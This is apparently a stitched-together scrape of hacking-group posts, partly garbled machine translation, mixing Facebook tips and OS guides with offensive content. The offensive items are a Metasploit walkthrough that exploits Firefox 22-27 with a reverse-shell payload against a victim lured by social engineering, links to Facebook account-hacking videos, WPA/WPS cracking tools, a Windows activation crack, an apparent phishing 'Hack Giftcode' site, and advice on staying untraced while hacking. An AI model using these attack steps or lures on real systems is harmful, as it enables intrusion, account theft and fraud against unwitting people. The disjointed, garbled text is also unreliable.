Google Calendar page, look for Other Calendars on the left side of the page and click on the down arrow button then choose Add by URL. Paste the link you just copied in the URL box and click on Add Calendar. Repeat step 3 onwards with the events link to completely transfer all your events from the Facebook calendar to your Google calendar. Sync Facebook Calendar With Google Calendar 3. Accept All Friend Requests At Once If you have a lot of pending friend requests list, you might find its tiring to accept all the requests one at a time. Apparently there is a way to accept all at once using a JavaScript code. At your friend requests page, make sure to have all the requests loaded by scrolling down the page until the end. Next, copy this JavaScript code: javascript:for( i = 1;i<document.getElementsByName("actions[accept]").length;i++){document.getElementsByName("actions[accept]")[i].click();}void(0); and paste it in the address bar of your friend requests page. Make sure to manually add javascript: at the front of the code once you have pasted it in the address bar because some browsers will automatically remove that line. Press Enter and watch the magic happens. Accept All Friend Requests At Once 4. Create Special "Via" Status (With Logo) Normally when we update our Facebook status with our smartphone, the status will also include via "your device name" at the bottom of the status update. Instead of this being just for devices, you can change it to anything you can think of. Just follow the instructions here to customize the "via" status of your Facebook post. this. Create Your Own Post 'Via' status With Logo 5. Stop Facebook From Tracking You Yes, Facebook tracks whatever you do on the main site or on sites that use Facebook Connect. That is why you are being served ads that are relevant to information you have recently searched for. Creepy, isn’t it? There is a way to regain some form of privacy for yourself, with a Chrome plugin called Facebook Disconnect. Facebook Disconnect uses JavaScript to disable Facebook component link traffic from being accessed by third-party sites. Once installed, this plugin works without further tinkering. Stop Facebook From Tracking You 6. Photo Zoom For Facebook With Photo Zoom you can view any photo updates on Facebook in a larger size on your timeline simply by hovering your mouse over it. Get the Chrome extension here. Photo Zoom for Facebook 7. Hide Last Name On Facebook Facebook needs you to declare your first and last name, that’s two names, but if you want to have your account bear only one name (or just your first name), you can. Indonesians can register an account with only one name since many of them actually go with just one name. So for you to have a single name like Neo here, check out the instructions below. Login to your Facebook account. Grab any Indonesian proxy from this list here then change your proxy on your browser. On Chrome for PC head to Settings > Show advanced settings > under Network, click on Change proxy settings > click on Lan Settings and tick "Use Proxy Server for your LAN". Fill in the address box with the proxy, and the port box accordingly. For example, if your proxy is 180.250.160.58:8080, "180.250.160.58" goes into the address box and "8080" is the port. Tick on Bypass Proxy Server For Local Addresses. Press OK. Now, go to your Facebook Account settings page, change the language to "Bahasa Indonesia" and save changes. Remove your Facebook last name and save changes again. Once you have complete everything, revert to your original language. Hide Last Name on Facebook 8. Create Fake Facebook Status Conversation Have you ever read about how World War II transpired on Facebook and the drama Avengers wreaked on Facebook? Well, those conversations are made possible with The Wall Machine. It’s a tool that allows you to forge status updates, comments, likes, recent activity, relationship update, and event attendance, with fake accounts and profile pictures as well. Create Fake Facebook Conversation 9. Turn Off Facebook Notification Sounds So you congratulated a friend on a wedding or new baby, or sent a get well soon note to a sickly friend, and now the Facebook notifications won’t stop coming. You have forgotten that Facebook notifications come with sounds and wish you could turn it off. Here’s how to stop it from making noise. Head over to Facebook Account Settings > go to Notifications tab At the top, untick "Play a sound when each new notification is received" and Save Changes. Turn Off Facebook Notification Sounds 10. Joint Facebook Profile And Cover Image Want to have your own creative Facebook covers? How about one of those where the profile picture is part of the cover photo? Use Tricked Out Timeline website to create your very own joined Facebook profile and cover image. There are 4 effects that you can choose starting from Merge Profile & Cover photo, Missing Jigsaw Piece, Tear Off The Bottom Edge, and Profile Picture Zoom. Joint Facebook Profile and Cover Image 11. Download Facebook History Do you know that you can download your entire Facebook history and have it all compiled in a zip file? Go to the Facebook Account Settings page, under the General tab, near the bottom is a link to "Download a copy of your Facebook data". The archive includes almost everything from photos to your chat history but if you want a detailed breakdown read here. Download Facebook History 12. Use Profile Picture As Emoticons Did you know that you can turn your friend’s profile pictures into emoticons and use them in a Facebook chat? Here’s how to set it up. First, visit the page of your friend you want to tag as an emoticon. Then look for their Facebook username or their Profile ID from the address bar link. For example you want to get hongkiatcom from "https://www.facebook.com/hongkiatcom". In any Facebook chat, when you type [[hongkiatcom]], brackets included, the profile picture will show during the chat. You can do this more than once in the same chat, and your friend(s) will not be notified when you use their profile picture as an emoticon in your chats. Use Profile Picture As Emoticons 13. Invite All Friends To A Facebook Event Instead of inviting your friends one by one to your Event or Facebook page, why not have them invited all at once? It is as easy as copy pasting a JavaScript code. Go to your Event Facebook page and click on Invite friends. Scroll down your friend list until the end to ensure you have loaded all the friends you want to invite. On Chrome, press CTRL + SHIFT + J (Windows) or CMD + Opt + J (Mac). Copy and paste this javascript:elms=document.getElementsByName("checkableitems[]");for (i=0;i<elms.length;i++){if (elms[i].type="checkbox" )elms[i].click()} followed by an Enter in the console space. You will then see all your friends name automatically ticked. invite All Friends to a Facebook Event 14. Download Facebook Videos Unlike Google+, Facebook does not include a feature to download the videos you see on the social network. Well, there is a really easy way to download your own copy. Simply go to this page, and paste that specific Facebook video URL to download the video. Download Facebook Videos 15. Enhance Your Facebook Experience With Social Fixer Want to customize Facebook to look exactly the way you want? Get rid of ads, change it to a previous layout, hide already read posts, force news feeds to "recent stories first" and a whole lot more with Social Fixer plugin. Enhance Your Facebook Experience With Social Fixer 16. Display Animated Gifs On Status Update With A Play Button Why aren’t animated gifs on Facebook yet? With giphy gifs it already is. Just find a gif that you want from giphy.com then share the link at your Facebook page. Display Animated Gifs On Status Update With A Play Button 17. Login To Facebook With Your Username Or Phone Numbers You know you need your email address to login to your Facebook but did you know you can also gain access with your username or phone number as well? If you don’t have a username yet, visit this link to create one. Login Facebook With Your Username or Phone Numbers 18. Share Facebook Statuses With Profile Pictures And Names Blurred Out Want to share a Facebook status but want to blur out profile pictures and sensitive names? Use Status Snapper for the job since it will automatically blur out the user name and profile image. The image wil also be automatically uploaded to imgur. Share Facebook Statuses With Profile Picture and Name Blur out 19. Removing Bitstrips From Your News Feed A viral app that you probably have seen at least once in your Facebook News feed is Bitstrips. Through Bitstrips you can create your own comics starring you or any of your friends. Its a fun idea, but to some Facebook user, Bitstrips is probably taking way to much space on their feeds. If you want to eradicate Bitstrips from your feed, we got your back. What is Bitstrips & How to remove them From Your News Feed 20. Facebook Keyboard Shortcuts So there are keyboard shortcuts on Google+, and also on YouTube, it’s no surprise that Facebook has their own set of keyboard shortcuts as well. Here are some Facebook keyboard shortcuts that you can use while browsing Facebook on Chrome for Mac. Shortcuts Descriptions Ctrl + Opt + 0 Help Ctrl + Opt + 1 Home Ctrl + Opt + 2 Timeline Ctrl + Opt + 3 Friends Ctrl + Opt + 4 Inbox Ctrl + Opt + 5 Notifications Ctrl + Opt + 6 Account Settings Ctrl + Opt + 7 Privacy Ctrl + Opt + 8 About Ctrl + Opt + 9 Terms Ctrl + Opt + M New Message C Comment on a story in News Feed J and K Scroll between News Feed stories I Like or unlike a selected story Q Search for a friend to chat with P Focus on the text box when making a post / Search Ctrl + G Search conversations Ctrl + Q Show/hide keyboard shortcuts Ctrl + Delete Archive/unarchive conversations Ctrl + C Mark as spam Ctrl + C Start a new message Ctrl + I Go to inbox Ctrl + U Go to other Check out all our other posts
Thirty competition like Facebook penetration method https://www.youtube.com/watch?v=SynOtxdW4wk&list method of zikr page https://www.youtube.com/watch?v=1IA9sNr4Oa4&list how close any Facebook account https://www.youtube.com/watch?v=x9NWORM7Bf0&list how to protect world Facebook hack Agua by garrison Facebook https://www.youtube.com/watch?v=N0NWklAbHWE&list method close account Facebook at phone number https://www.youtube.com/watch?v=x__oRS3sCVE&list a Russian what email bnhadar Facebook https://www.youtube.com/watch?v=c8Xpwpzy2SQ&list Facebook account opening way to Labado akhbtar photo https://www.youtube.com/watch?v=_D5_LLrfgpQ&list a way to avoid closing a Facebook identity is the identity of the image never https://www.youtube.com/watch?v=swM9aT8gpfw&list tigik workings of Facebook account without asking you to phone number https://www.youtube.com/watch?v=gOdaOwd8Ksw&list way to increase the number of fans of Facebook pages more than 20,000 fans every day the first method: Https://www.youtube.com/watch?v=Hm7l3mNB_WQ&list method 2: https://www.youtube.com/watch?v=va6dHzc-3L4&list altarithh 3: https://www.youtube.com/watch?v=_yPeesaDC64&list way to change name on Facebook after five times exceeds the https://www.youtube.com/watch?v=8CXwW2i7lJ4&list way to present requests for friendship in Facebook https://www.youtube.com/watch?v=r38235m42xE&list method avoiding urban requests friendship on Facebook with just one click https://www.youtube.com/watch?v=ytadMvNt8s8&list way to increase the number of friends on Facebook to 5000 friend from any country of your choice https://www.youtube.com/watch?v=RBSwXB4LZSM&list penetration aloirls: https://www.youtube.com/watch?v=C7ynbvFj5ko&list my channel: https://www.youtube.com/channel/UChd5qvl_qsq1JTxAQOqBihw my page: https://www.facebook.com/school.hakar
How to build own Operating System.. ================================ You might be using Windows,LINUX or Mac Operating System from very long. Ever wondered how these Operating System are made ? Or Ever think of making own Operating System ?? The Operating System you are going to create online will be Linux Operating System. There is no technical skills required for creating an own Linux Operating System online. Linux is a kernel, which can be used to create Operating Systems. Operating System(s) created by using Linux kernel are called Linux Operating System(s). Example of Linux Operating Systems are Ubuntu and SUSE To create own Operating System you don’t need to be a computer master or a programmer, all you need is a website: SUSE Studio. Yes, you can create your own Operating System online from ---> www. susestudio .com www. susestudio .com Sign in with your account, have to select a base package and desktop environment, 32 bit or 64 bit and then have to customize it like Logo, Soft-wares etc. once you have created your Own Linux Operating System you have to click on build and have to download an ISO image. You can burn this ISO image in a CD/DVD and can use that CD/DVD to install your own Operating System, just like you do with Windows or Linux CD......
To make an account on Facebook to avoid closing http://youtu.be/OD17S6p4BlI
To make an account on Facebook to avoid closing http://youtu.be/OD17S6p4BlI
How to download an APK from Google Play using a website. If you're a much more casual APK downloader then a Chrome extension is probably not really necessary. Instead, you can just visit a dedicated site for generating APK download links whenever you need to. 1. Go to the Play Store and find the app you want to download. 2. Copy the app's package ID. 3. Go to a site like Evozi's APK Downloader http:// apps.evozi.com/apk-downloader/ (Evozi also has a Chrome/Firefox extension) and paste the app package name (or the whole Google Play URL if you're lazy) in the box at the top of the page. You can simply generate unique download links every time you want to grab an APK. © Evozi 4. Hit the blue button to generate the download link and save it to your computer. 5. Feel free to confirm the version number with that on Google Play and do an MD5 file check if you're at all paranoid about what you're getting. 6. Run a virus scan on the file too if that makes you feel better. 7. Sideload the APK to your phone/tablet and install it as above.
Hack Remote Windows, Linux or MAC PC using Firefox WebIDL Privileged Javascript Injection This exploit gains remote code execution on Firefox 22-27 by abusing two separate privilege escalation vulnerabilitiesin Firefox’s Javascript APIs Exploit Targets Firefox 22-27 Windows XP SP 3 Windows 7 Linux OSX Requirement Attacker: kali Linux Victim PC: Windows 7 Open Kali terminal type msfconsole Now type use exploit/multi/browser/firefox_webidl_injection msf exploit (firefox_webidl_injection)>setpayload firefox/shell_reverse_tcp msf exploit (firefox_webidl_injection)>setlhost 192.168.0.5 (IP of Local Host) msf exploit (firefox_webidl_injection)>setsrvhost 192.168.0.5 msf exploit (firefox_webidl_injection)>seturipath / msf exploit (firefox_webidl_injection)>exploit Now an URL you should give to your victim http://192.168.0.5:8080 Send the link of the server to the victim via chat or email or any social engineering technique Now you have access to the victims PC. Use “sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“ Enjoy
Want to be anonymous online to view blocked websites, protect your self from hackers or want to hack some one and stay un-traced?. In the following post i will explain 4 easy ways by which you can stay anonymous online! ---------------------------------- 1. Using Proxies A proxy is an address ( IP address ) of a Server (proxy server) that is placed between your computer and the Internet The advantage of a proxy is that your real IP address is Hidden so when you hack your giving the IP address of the proxy sever and not your real IP address Same way if your a normal Internet user the hacker won't get your real IP but the IP of the proxy server.You can use it to enter site or forum that you are IP is banned. To know more about proxies les me know above this post and I will post a full tutotial about it. 2. Using Tor Tor-proxy is a free proxy-server service that Internet users can use to hide their IP address while surfing the Web. Tor (The Onion Router) is free software for enabling online anonymity. Tor directs Internet traffic through a free, worldwide volunteer network consisting of more than three thousand relays to conceal a user's location or usage from anyone. I have written a complete How to guide on how to use tor - just let me know if you need it 3. SSH Tunneling SSH tunnel is an encrypted tunnel created through an SSH protocol connection. SSH tunnels may be used to tunnel unencrypted traffic over a network through an encrypted channel.In easy language,you can surf net without being monitored and even surf blocked sites too. To know more about SSH and SSH tunneling let me know if you would like to read: SSH tunneling guide. 4. Using VPN Virtual Private Network. Basically it’s a private network which lets users to connect to other users or remote sites using a public network usually internet. It uses “virtual” connections routed through the Internet from the company’s private network to the remote site or employee instead of physical connections. In short, it is private network constructed within a public network infrastructure, such as the global Internet. The Biggest difference between proxy and VPN is everything in a VPN is encrypted which gives an additional layer of security.
SteamOS is a Debian GNU/Linux-based operating system in development by Valve Corporation designed to be the primary operating system for the Steam Machine game consoles.And it is designed primarily for playing video games. Users will be able to stream games from their Windows or Mac computers to one running SteamOS, and it will incorporate the same familysharing and restrictions as Steam on the desktop. Valve claims that it has “achieved significant performance increases in graphics processing” through SteamOS. The operating system is open source allowing anyone to buildon or adapt the source code. Since SteamOS is designed for playing games it does not have many built-in functions beyond web browsing and playing games; for example there is no file manager or image viewer installed by default. Users can, however, install other software by using the inbuilt GNOME desktop environment. Though the OS does not, in its current form, support streaming services, Valve is in talks with streaming companies to bring the feature to SteamOS. The OSdoes not currently support AMD or Intel graphics cards and so requires an Nvidia one. What are the SteamOS Hardware Requirements? Processor: Intel or AMD 64-bit capable processor Memory: 4GB or more RAM Hard Drive: 500GB or larger diskVideo Card: NVIDIA graphics card(AMD and Intel graphics support coming soon!) Additional: UEFI boot supportUSB port for installation The next question will be how you can install it in your computer Right . There are two methods for installation, but both will erase entire your hard disk ,so you have to take care aboout that,Default InstallationYou will need to create a SteamOS System Restore USB stick to perform this install. The image provided here requires atleast a 1TB disk. 1.Download the default SteamOS beta installation(http://store.steampowered.com/steamos/download/?ver=default) 2.Format a 4GB or larger USB stick with the FAT32 filesystem.Use “SYSRESTORE” as the partition name. 3.Unzip the contents of SYSRESTORE.zip to this USB stick to create the System Restore USB stick. 4.Put the System Restore USB stick in your target machine. Boot your machine and tell the BIOS to boot off the stick. (usually something like F8, F11 or F12 will bring up the BIOS boot menu). 5.Make sure you select the UEFI entry, it may look something like “UEFI: Patriot Memory PMAP”. If there is no UEFI entry, you may need to enable UEFI support in your BIOS setup. 6.Select “Restore Entire Disk” from the GRUB menu. 7.When it is complete it will shutdown. Power on the machine to boot into your freshly re-imaged SteamOS. Custom Installation The second method is based on the Debian Installer. It requires multiple configuration steps: 1.Download the custom SteamOS beta installation(http://store.steampowered.com/steamos/download/?ver=default) 2.Unzip the SteamOS.zip file to a blank, FAT32-formatted USB stick. 3.Put the USB stick in your target machine. Boot your machine and tell the BIOS to boot off the stick. (usually something like F8, F11, or F12 will bring up the BIOS boot menu). 4.Make sure you select the UEFI entry, it may look something like “UEFI: Patriot Memory PMAP”. If there is no UEFI entry, you may need to enable UEFI support in your BIOS setup. 5.Selected “Automated install” from the menu. 6.The rest of the installation is unattended and will repartition the drive and install SteamOS. 7.After installation is complete, log onto the resulting system (using the Gnome session) withthe predefined “steam” account. The password is “steam”. Run steam, accept the EULA, and let it bootstrap. Logoff the steam account. 8.Log on with the “desktop” account. The password is “desktop”. 9.From a terminal window, run~/post_logon.sh. This will prompt for a password – enter “desktop”. This script will perform the post-install customizations, delete itself, then reboot into the recovery partition capture utility. 10.Confirm “y” to continue and the recovery partition will be created. When it is finished, reboot into your freshly installed SteamOS. But if you still face any difficulty then just Google it coz it is little bit complicated
gلا تنسى الاشتراك في القناة ليصلك كل جديد . http://www.eh-academy.com/2014/11/7-blind-sql-injection.html
Use Gmail without internet on Chrome with Gmail offline Gmail is one of the most used email service online, it is amongst one of the most popular service like Facebook, Youtube etc, Facebook can also be used without internet as we have already told using Facebook by fonetwish, You can also browse gmail offline easily with the help of a chrome extension “Gmail offline” Once you have installed it you can enable offline surfing for your account. You can enable offline gmail directly from your account, Here is a short tutorial to guide you, explain the features it provide, how to do it and how it works How to configure:- Go to http://www.gmail.com from the chrome browser, click on settings (gear) and then again settings again Click offline tab > install gmail offline Once you do it, you will be redirected to the chrome appstore to download the extension “gmail offline”, download it, after the download completes following link will open up- chrome://apps/ showing a list of apps you need to click on “gmail offline” as you click it your email will open up showing you the messages received and other folders, you can read these conversations and messages offline without internet. That’s it, now when ever you are offline and don’t have anything to do, just open up this link chrome://apps/ and browse gmail offline without active internet connection. You can use this app offline to read, archive, delete mails etc, It is necessary to connect with internet in order to sync the messages, while you are offline all your requests for read,delete will stand in queue to be processed as soon as you connect with the internet.
What is a VPN and how does it work? A VPN or Virtual Private Network is a method used to add security and privacy to private and public networks, like WiFi Hotspots and the Internet. VPNs are most often used by corporations to protect sensitive data. However, using a personal VPN is increasingly becoming more popular for every citizen as more interactions that were previously face- to-face transition to the Internet. Privacy is increased with a VPN because the user’s initial IP address is replaced with one from the VPN provider. This method allows subscribers to attain an IP address from any gateway city the VPN service provides. For instance, you may live in San Francisco, but with a VPN, you can appear to live in Amsterdam, New York, or any number of gateway cities. It is also the best method to surf anonymously. And on top: You will bypass online blocks to access foreign content like a local. Get to websites back home when you’re abroad. And bypass government or workplace censorship of sites like Facebook, Gmail and Youtube. Plus, you can download torrents and use P2P programmes anonymously. Which VPN Service does Anonymous recommend and use? There are many choices when it comes to VPN providers. There are some VPN providers who offer free service and there are some which charge for VPN service. We have found that the paid VPN provider IPVANISH is doing an excellent job compared to the free service providers, which are very unreliable, slow and not safe. IPVANISH offers robust gateways, proven security, free software, unmatched speed, unlimited bandwith, and the best of all: IT HAS NO TRAFFIC LOGS! Unlike other VPN companies do they NOT collect any data because of their no-log policy! And to stay completely and 100% anonymous, they even offer to pay via paysafecard (but they offer also the usual payment methods and even accept paypal). And on top of that do they not only offer the VPN software for Windows, Mac, Ubuntu, Chromebook and Routers, but they also offer ANDROID & IOS VPN Apps for easy install. It is really easy to setup the VPN connection either on PCs or on mobile devices with the apps, everyone can do it within a few clicks.
Program wifiprotector protection aloivi hack http://www.taqafa2.com/2014/11/wifiprotector.html
[FAST HACKING] Remote Exploit in Internet Explorer Like, share and subscribe https://www.youtube.com/watch?v=klWKnxIyGRg
Windows system key combinations F1: Help CTRL+ESC: Open Start menu ALT+TAB: Switch between open programs ALT+F4: Quit program SHIFT+DELETE: Delete item permanently Windows Logo+L: Lock the computer (without using CTRL+ALT+DELETE) Windows program key combinations CTRL+C: Copy CTRL+X: Cut CTRL+V: Paste CTRL+Z: Undo CTRL+B: Bold CTRL+U: Underline CTRL+I: Italic Mouse click/keyboard modifier combinations for shell objects SHIFT+right click: Displays a shortcut menu containing alternative commands SHIFT+double click: Runs the alternate default command (the second item on the menu) ALT+double click: Displays properties SHIFT+DELETE: Deletes an item immediately without placing it in the Recycle Bin General keyboard-only commands F1: Starts Windows Help F10: Activates menu bar options SHIFT+F10 Opens a shortcut menu for the selected item (this is the same as right-clicking an object CTRL+ESC: Opens the Start menu (use the ARROW keys to select an item) CTRL+ESC or ESC: Selects the Start button (press TAB to select the taskbar, or press SHIFT+F10 for a context menu) CTRL+SHIFT+ESC: Opens Windows Task Manager ALT+DOWN ARROW: Opens a drop-down list box ALT+TAB: Switch to another running program (hold down the ALT key and then press the TAB key to view the task-switching window) SHIFT: Press and hold down the SHIFT key while you insert a CD-ROM to bypass the automatic-run feature ALT+SPACE: Displays the main window's System menu (from the System menu, you can restore, move, resize, minimize, maximize, or close the window) ALT+- (ALT+hyphen): Displays the Multiple Document Interface (MDI) child window's System menu (from the MDI child window's System menu, you can restore, move, resize, minimize, maximize, or close the child window) CTRL+TAB: Switch to the next child window of a Multiple Document Interface (MDI) program ALT+underlined letter in menu: Opens the menu ALT+F4: Closes the current window CTRL+F4: Closes the current Multiple Document Interface (MDI) window ALT+F6: Switch between multiple windows in the same program (for example, when the Notepad Find dialog box is displayed, ALT+F6 switches between the Find dialog box and the main Notepad window) Shell objects and general folder/Windows Explorer shortcuts For a selected object: F2: Rename object F3: Find all files CTRL+X: Cut CTRL+C: Copy CTRL+V: Paste SHIFT+DELETE: Delete selection immediately, without moving the item to the Recycle Bin ALT+ENTER: Open the properties for the selected object To copy a file Press and hold down the CTRL key while you drag the file to another folder. To create a shortcut Press and hold down CTRL+SHIFT while you drag a file to the desktop or a folder. General folder/shortcut control F4: Selects the Go To A Different Folder box and moves down the entries in the box (if the toolbar is active in Windows Explorer) F5: Refreshes the current window. F6: Moves among panes in Windows Explorer CTRL+G: Opens the Go To Folder tool (in Windows 95 Windows Explorer only) CTRL+Z: Undo the last command CTRL+A: Select all the items in the current window BACKSPACE: Switch to the parent folder SHIFT+click+Close button: For folders, close the current folder plus all parent folders Windows Explorer tree control Numeric Keypad *: Expands everything under the current selection Numeric Keypad +: Expands the current selection Numeric Keypad -: Collapses the current selection. RIGHT ARROW: Expands the current selection if it is not expanded, otherwise goes to the first child LEFT ARROW: Collapses the current selection if it is expanded, otherwise goes to the parent Properties control CTRL+TAB/CTRL+SHIFT+TAB: Move through the property tabs Accessibility shortcuts Press SHIFT five times: Toggles StickyKeys on and off Press down and hold the right SHIFT key for eight seconds: Toggles FilterKeys on and off Press down and hold the NUM LOCK key for five seconds: Toggles ToggleKeys on and off Left ALT+left SHIFT+NUM LOCK: Toggles MouseKeys on and off Left ALT+left SHIFT+PRINT SCREEN: Toggles high contrast on and off Microsoft Natural Keyboard keys Windows Logo: Start menu Windows Logo+R: Run dialog box Windows Logo+M: Minimize all SHIFT+Windows Logo+M: Undo minimize all Windows Logo+F1: Help Windows Logo+E: Windows Explorer Windows Logo+F: Find files or folders Windows Logo+D: Minimizes all open windows and displays the desktop CTRL+Windows Logo+F: Find computer CTRL+Windows Logo+TAB: Moves focus from Start, to the Quick Launch toolbar, to the system tray (use RIGHT ARROW or LEFT ARROW to move focus to items on the Quick Launch toolbar and the system tray) Windows Logo+TAB: Cycle through taskbar buttons Windows Logo+Break: System Properties dialog box Application key: Displays a shortcut menu for the selected item Microsoft Natural Keyboard with IntelliType software installed Windows Logo+L: Log off Windows Windows Logo+P: Starts Print Manager Windows Logo+C: Opens Control Panel Windows Logo+V: Starts Clipboard Windows Logo+K: Opens Keyboard Properties dialog box Windows Logo+I: Opens Mouse Properties dialog box Windows Logo+A: Starts Accessibility Options (if installed) Windows Logo+SPACEBAR: Displays the list of Microsoft IntelliType shortcut keys Windows Logo+S: Toggles CAPS LOCK on and off Dialog box keyboard commands TAB: Move to the next control in the dialog box SHIFT+TAB: Move to the previous control in the dialog box SPACEBAR: If the current control is a button, this clicks the button. If the current control is a check box, this toggles the check box. If the current control is an option, this selects the option. ENTER: Equivalent to clicking the selected button (the button with the outline) ESC: Equivalent to clicking the Cancel button ALT+underlined letter in dialog box item: Move to the corresponding item
http://www.wirelessdomination.com/how-to-crack-wpa2-and-wpa-wifi-password-step-by-step-guide/
The software developer to penetrate networks with wps http://www.gulfup.com/?PW9dFt vulnerability
https://www.youtube.com/watch?v=LQ0b2O5Ut-k&list=UUzvVkaOuE06-OYif2J27EPQ
http://wizarg.blogspot.ro/2014/11/cheat-8-ball-pool-d3d-menu_4.html
6tunnel - TCP proxy for non-IPv6 applications
aircrack-ng - WEP/WPA cracking program
amap - a powerful application mapper
arp-scan - arp scanning and fingerprinting tool
bfbtester - Brute Force Binary Tester
bing-ip2hosts - Enumerate hostnames for an IP using bing
bsqlbf - Blind SQL injection brute forcer tool
btscanner - ncurses-based scanner for Bluetooth devices
chaosreader - trace network sessions and export it to html format
chkrootkit - rootkit detector
cryptcat - A lightweight version netcat extended with twofish encryption
darkstat - network traffic analyzer
dhcpdump - Parse DHCP packets from tcpdump
dissy - graphical frontend for objdump
dmitry - Deepmagic Information Gathering Tool
dns2tcp - TCP over DNS tunnel client and server
dnswalk - Checks dns zone information using nameserver lookups
dsniff - Various tools to sniff network traffic for cleartext insecurities
enum4linux - a tool for enumerating information from Windows and Samba systems
etherape - graphical network monitor
exploit-db - Exploit Database
fcrackzip - password cracker for zip archives
fimap - local and remote file inclusion tool
flasm - assembler and disassembler for Flash (SWF) bytecode
foremost - forensic program to recover lost files
fping - sends ICMP ECHO_REQUEST packets to network hosts
ftp-proxy - application level proxy for the FTP protocol
galleta - An Internet Explorer cookie forensic analysis tool
ghettotooth - a simple but effective blue driving tool
hostmap - hostnames and virtual hosts discovery tool
hping3 - Active Network Smashing Tool
httptunnel - Tunnels a data stream in HTTP requests
httrack - Copy websites to your computer (Offline browser)
hydra - Very fast network logon cracker
ike-scan - discover and fingerprint IKE hosts (IPsec VPN Servers)
inguma - Open source penetration testing toolkit
iodine - tool for tunneling IPv4 data through a DNS server
ipcalc - parameter calculator for IPv4 addresses
isr-evilgrade - take advantage of poor upgrade implementations by injecting fake updates
ipgrab - tcpdump-like utility that prints detailed header information
john - active password cracking tool
kismet - Wireless 802.11b monitoring tool
knocker - Simple and easy to use TCP security port scanner
lcrack - A generic password cracker
lynis - security auditing tool for Unix based systems
macchanger - utility for manipulating the MAC address of network interfaces
mboxgrep - Grep through mailboxes
mdk3 - bruteforce SSID's, bruteforce MAC filters, SSID beacon flood
medusa - fast, parallel, modular, login brute-forcer for network services
metagoofil - an information gathering tool designed for extracting metadata
metasploit - security project which provides information about security vulnerabilities
mysqloit - SQL Injection takeover tool focused on LAMP
mz - versatile packet creation and network traffic generation tool
nbtscan - A program for scanning networks for NetBIOS name information
netcat-traditional - TCP/IP swiss army knife
netdiscover - active/passive network address scanner using arp requests
netrw - netcat like tool with nice features to transport files over network
netsed - network packet-altering stream editor
netwag - graphical frontend for netwox
netwox - networking utilities
nikto - web server security scanner
nmapsi4 - graphical interface to nmap, the network scanner
nmap - The Network Mapper
nstreams - network streams - a tcpdump output analyzer
obexftp - file transfer utility for devices that use the OBEX protocol
onesixtyone - fast and simple SNMP scanner
openvas-client - Remote network security auditor, the client
openvas-server - remote network security auditor - server
ophcrack-cli - Microsoft Windows password cracker using rainbow tables (cmdline)
ophcrack - Microsoft Windows password cracker using rainbow tables (gui)
otp - Generator for One Time Pads or Passwords
p0f - Passive OS fingerprinting tool
packeth - Ethernet packet generator
packit - Network Injection and Capture
pbnj - a suite of tools to monitor changes on a network
pentbox - Suite that packs security and stability testing oriented tools
pdfcrack - PDF files password cracker
pnscan - Multi threaded port scanner
proxychains - proxy chains - redirect connections through proxy servers
pscan - Format string security checker for C files
ptunnel - Tunnel TCP connections over ICMP packets
ratproxy - passive web application security assessment tool
reaver - brute force attack tool against Wifi Protected Setup PIN number
s.e.t - social engineering toolkit
scrub - writes patterns on magnetic media to thwart data recovery
secure-delete - tools to wipe files, free disk space, swap and memory
sendemail - lightweight, command line SMTP email client
siege - HTTP regression testing and benchmarking utility
sipcrack - SIP login dumper/cracker
sipvicious - suite is a set of tools that can be used to audit SIP based VoIP systems
skipfish - fully automated, active web application security reconnaissance tool
socat - multipurpose relay for bidirectional data transfer
splint - tool for statically checking C programs for bugs
sqlbrute - a tool for brute forcing data out of databases using blind SQL injection
sqlmap - tool that automates the process of detecting and exploiting SQL injection flaws
sqlninja - SQL Server injection and takeover tool
ssldump - An SSLv3/TLS network protocol analyzer
sslscan - Fast SSL scanner
sslsniff - SSL/TLS man-in-the-middle attack tool
sslstrip - SSL/TLS man-in-the-middle attack tool
stunnel4 - Universal SSL tunnel for network daemons
swaks - SMTP command-line test tool
tcpdump - command-line network traffic analyzer
tcpflow - TCP flow recorder
tcpick - TCP stream sniffer and connection tracker
tcpreplay - Tool to replay saved tcpdump files at arbitrary speeds
tcpslice - extract pieces of and/or glue together tcpdump files
tcpspy - Incoming and Outgoing TCP/IP connections logger
tcptrace - Tool for analyzing tcpdump output
tcpxtract - extracts files from network traffic based on file signatures
theHarvester - gather emails, subdomains, hosts, employee names, open ports and banners
tinyproxy - A lightweight, non-caching, optionally anonymizing HTTP proxy
tor - anonymizing overlay network for TCP
u3-tool - tool for controlling the special features of a U3 USB flash disk
udptunnel - tunnel UDP packets over a TCP connection
ussp-push - Client for OBEX PUSH
vidalia - controller GUI for Tor
vinetto - A forensics tool to examine Thumbs.db files
voiphopper - VoIP infrastructure security testing tool
voipong - VoIP sniffer and call detector
w3af-console - framework to find and exploit web application vulnerabilities (CLI only)
w3af - framework to find and exploit web application vulnerabilities
wapiti - Web application vulnerability scanner
wash - scan for vunerable WPS access points
wavemon - Wireless Device Monitoring Application
wbox - HTTP testing tool and configuration-less HTTP server
webhttrack - Copy websites to your computer, httrack with a Web interface
weplab - tool designed to break WEP keys
wfuzz - a tool designed for bruteforcing Web Applications
wipe - Secure file deletion
wireshark - network traffic analyzer - GTK+ version
xprobe - Remote OS identification
yersinia - Network vulnerabilities check software
zenmap - The Network Mapper Front End
zzuf - transparent application fuzzer
لتحميل من الموقع الرسمي بحجم
" 590 MB "
username:
" root "
password:
" toor "
Hacker-ANASS
Program activation of Windows 8-7-xp just installed after installation restart your computer http://www.gulfup.com/?9V3l2I Admin: ṇ̣̣̝̇̇̇ɑ̣̣̝̇̇çk̲̣̣̥ê̲̣̥â̲̣̣̥ 0 ̲̣̣̥ _ 2̲̣̣̣̥0̲̣̣̥1
Lesson 2 of python:).. If less interaction with unstoppable;) Good luck:), https://www.youtube.com/watch?v=l_vs8owRawc
https://www.youtube.com/watch?v=W5mL1zynPbU&feature=youtu.be
How to spy on the menmak Web https://www.youtube.com/watch?v=tC3My4h1AVs M-sTęr JøcKër
فية اضافة الثغرات ميتاسبلويت على الكالي لينكس How To Add Metasploit Exploits To Kali #par-leon HDz http://www.youtube.com/
Hack Giftcode 2014 1. Login with Facebook Account 2. Chose giftcode Class A,B,C,D,R 3. Klick Hack Giftcode 4. Enjoy, Cek your Giftcode Link Hack : http://djrodje-vracevichack2014.hol.es
http://hackerzzworlds.blogspot.in/2014/11/wakpa-htmlxml-wapka-phishing-code-of.html
Making application to fetch the icon shows your basic blvigwal. His scenes pleasant #aBoSoso https://www.youtube.com/watch?v=qtSvri3ohP4&feature=youtu.be
http://worldwideprogramers.blogspot.in/2013/06/101-websites-which-are-very-usefull.html
